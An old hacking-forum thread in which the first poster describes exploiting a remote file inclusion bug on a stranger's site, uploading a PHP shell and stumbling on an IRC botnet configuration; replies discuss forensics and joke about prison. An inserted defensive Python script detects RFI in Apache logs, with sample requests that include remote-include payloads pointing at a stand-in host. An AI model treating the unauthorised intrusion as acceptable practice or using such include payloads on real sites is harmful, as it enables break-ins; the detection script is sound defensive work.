  • Web assessment turns Botnet Tracking

    Well, about every night till the early morning I like to perform web assessments to see what I can find in developers' web applications. Usually it's something different every day. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable PHP application on a website. The application was vulnerable to RFI, more commonly known as remote file inclusion. So I uploaded a PHP shell and took a look around. First place I look, of course, is the /tmp directory. Of course most of you know almost any user can run malicious code or upload applications in that directory because of the permissions that are set on it. Well, before I could even think about doing something like that, I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file, and at the very beginning was the configuration for an IRC server and its botnet owner. Then I quickly copied and pasted the configuration, exited the file and removed the malicious code. After thinking for a bit I decided to go check out what really goes on in that server, so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
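    An added example, not code from the thread: the RFI the first post describes leaves a recognisable trace in the web server's access log, because the attacker has to pass a remote URL (or a PHP stream wrapper) as a query parameter. The script below parses constructed Apache combined-format lines and flags those requests, including percent-encoded ones, so a defender can spot this pattern before someone finds a botnet.txt in /tmp. The log lines, hosts and paths are made up.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2009:02:14:11 -0500] "GET /index.php?page=about HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2009:02:14:19 -0500] "GET /index.php?page=http://evil.example/shell.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/May/2009:02:15:02 -0500] "GET /view.php?inc=%68%74%74%70%3A%2F%2Fevil.example%2Fc.txt HTTP/1.1" 200 77 "-" "curl/7.19"
198.51.100.4 - - [10/May/2009:02:15:40 -0500] "GET /view.php?inc=ftp://evil.example/x HTTP/1.0" 200 77 "-" "curl/7.19"
192.0.2.9 - - [10/May/2009:02:16:00 -0500] "GET /search.php?q=http%20server HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Parameter values a PHP include() would fetch remotely when allow_url_include is on.
REMOTE_RE = re.compile(r'^(?:https?|ftps?|php|data)://', re.IGNORECASE)


def find_rfi_attempts(log_text):
    """Return (ip, path, param, decoded_value) for every request whose
    query parameter is an absolute URL or stream wrapper."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group('target'))
        # parse_qsl decodes one layer of percent-encoding; unquote catches a second.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            decoded = unquote(value).strip()
            if REMOTE_RE.match(decoded):
                hits.append((m.group('ip'), parts.path, name, decoded))
    return hits


def attempts_by_ip(log_text):
    """Count flagged requests per client IP, a simple triage view."""
    counts = {}
    for ip, *_ in find_rfi_attempts(log_text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == '__main__':
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print('RFI attempt: ip=%s path=%s %s=%s' % hit)
```

A plain search term such as "http server" in the last sample line is not flagged, because only values that start with a scheme and "://" are treated as remote includes.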


  • #2
    Re: Web assessment turns Botnet Tracking

    Originally posted by disablmalfunc View Post
    Well, about every night till the early morning I like to perform web assessments to see what I can find in developers' web applications. Usually it's something different every day. What I uncovered today was definitely something I do not do all the time. I had found a vulnerable PHP application on a website. The application was vulnerable to RFI, more commonly known as remote file inclusion. So I uploaded a PHP shell and took a look around. First place I look, of course, is the /tmp directory. Of course most of you know almost any user can run malicious code or upload applications in that directory because of the permissions that are set on it. Well, before I could even think about doing something like that, I viewed what was already in the directory and the first thing I saw was a "botnet.txt". So of course I "cat" the file, and at the very beginning was the configuration for an IRC server and its botnet owner. Then I quickly copied and pasted the configuration, exited the file and removed the malicious code. After thinking for a bit I decided to go check out what really goes on in that server, so here is what happens... http://pastebin.com/f561066df

    After that conversation I had to share it. Has anything you guys have done on a regular basis led you to something fun and interesting?
    Did you leave the server with the botnet online? I would think the first thing you'd want to do is pull it offline.
    perl -e 'print pack(c5, (41*2), sqrt(7056), (unpack(c,H)-2), oct(115), 10)'



    • #3
      Re: Web assessment turns Botnet Tracking

      I'd pull it offline and do full forensics on it to see what sort of nastiness has made its way on to the box

      I return whatever i wish . Its called FREEDOWM OF RANDOMNESS IN A HECK . CLUSTERED DEFEATED CORn FORUM . Welcome to me



      • #4
        Re: Web assessment turns Botnet Tracking

        Sometimes just watching it for a bit will uncover the bots intention and perhaps even take you to its leader.



        • #5
          Re: Web assessment turns Botnet Tracking

          Well, I just recently started learning about intrusion forensics, and it seems the papers and books I study all have different thoughts on what to do if compromised. They all seem to agree on preserving the hard drives, which I have done. What other things do you guys suggest should be the next step?



          • #6
            Re: Web assessment turns Botnet Tracking

            Pretty funny conversation. Learned anything new about it?
            "The code itself sucked... it was not worth the $1.7 million they said"
            -Jonathan James



            • #7
              Re: Web assessment turns Botnet Tracking

              Sounds quite interesting...

              For general knowledge, "solitario" is a Spanish word for lonely/alone; it is also a card game, though in this case I would think the owner went for the first choice.

              It is also an Italian word for hermit, but I am not sure it is part of the Portuguese language.
              knowledge is power



              • #8
                Re: Web assessment turns Botnet Tracking

                Originally posted by HANNAHHACKER View Post
                Sounds quite interesting...

                For general knowledge, "solitario" is a Spanish word for lonely/alone; it is also a card game, though in this case I would think the owner went for the first choice.

                It is also an Italian word for hermit, but I am not sure it is part of the Portuguese language.
                :mind in gutter

                Or you could take it figuratively as playing with oneself. ;-)

                or to use Brit slang; he's a wanker!!!!! :-)

                :mind out of gutter.

                xor
                Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.



                • #9
                  Re: Web assessment turns Botnet Tracking

                  Originally posted by disablmalfunc View Post
                  Well, I just recently started learning about intrusion forensics, and it seems the papers and books I study all have different thoughts on what to do if compromised. They all seem to agree on preserving the hard drives, which I have done. What other things do you guys suggest should be the next step?
                  I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                  1. Get Caught
                  2. Make World News
                  3. Go To Prison
                  4. Write Security Book While In Prison
                  5. Get Out
                  6. Speak At Defcon
                  7. Land Security Consulting Job for Fortune 500 Making 6 Figures.

                  :-)

                  xor
                  Just because you can doesn't mean you should. This applies to making babies, hacking, and youtube videos.



                  • #10
                    Re: Web assessment turns Botnet Tracking

                    Originally posted by xor View Post
                    I don't think you are doing him/her any favors by telling him/her to cover their tracks better. How else will they:

                    1. Get Caught
                    2. Make World News
                    3. Go To Prison
                    4. Write Security Book While In Prison
                    5. Get Out
                    6. Speak At Defcon
                    7. Land Security Consulting Job for Fortune 500 Making 6 Figures.

                    :-)

                    xor
                    Haha True. Then we would have nothing to look forward to. ^_^
